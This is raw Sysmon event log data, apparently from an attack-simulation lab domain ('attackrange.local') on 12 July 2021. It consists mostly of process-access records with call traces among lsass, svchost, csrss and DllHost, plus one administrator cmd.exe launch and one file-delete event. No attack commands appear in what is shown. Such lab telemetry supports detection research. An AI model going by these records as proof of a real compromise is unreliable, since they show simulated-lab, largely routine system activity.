C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048758Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.948{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" C:\Windows\system32\ATTACKRANGE\Administrator{466BC892-F49A-60EB-D4CC-F90400000000}0x4f9ccd43HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{466BC892-32D3-60E8-6F0B-00000000CF01}7076C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding 10341000x80000000000000001048757Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.918{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F49A-60EB-307D-00000000CF01}10076C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048756Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.918{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F49A-60EB-307D-00000000CF01}10076C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048755Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.918{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F49A-60EB-307D-00000000CF01}10076C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048754Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.886{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048753Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.886{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048752Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.855{466BC892-02B0-60E8-1600-00000000CF01}13047824C:\Windows\System32\svchost.exe{466BC892-F49A-60EB-2F7D-00000000CF01}1148C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048751Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.855{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F49A-60EB-2F7D-00000000CF01}1148C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048750Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.855{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F49A-60EB-2F7D-00000000CF01}1148C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048749Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.851{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F49A-60EB-2F7D-00000000CF01}1148C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048748Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.833{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F49A-60EB-2F7D-00000000CF01}1148C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048747Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.833{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F49A-60EB-2F7D-00000000CF01}1148C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048746Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.818{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048745Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.818{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048744Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.818{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048743Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.818{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048742Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.802{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048741Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.802{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048740Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.802{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048739Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.802{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048738Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.802{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048737Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.802{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048736Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.687{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048735Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.687{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807499Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:54.260{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86E80AB071636491CA308ED5E2D72F30,SHA256=55C297B26A82F074700071D9113886499BA97A0332646E0CF8314EC23318AC42,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048734Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.187{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F49A-60EB-2E7D-00000000CF01}9000C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048733Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.171{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048732Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 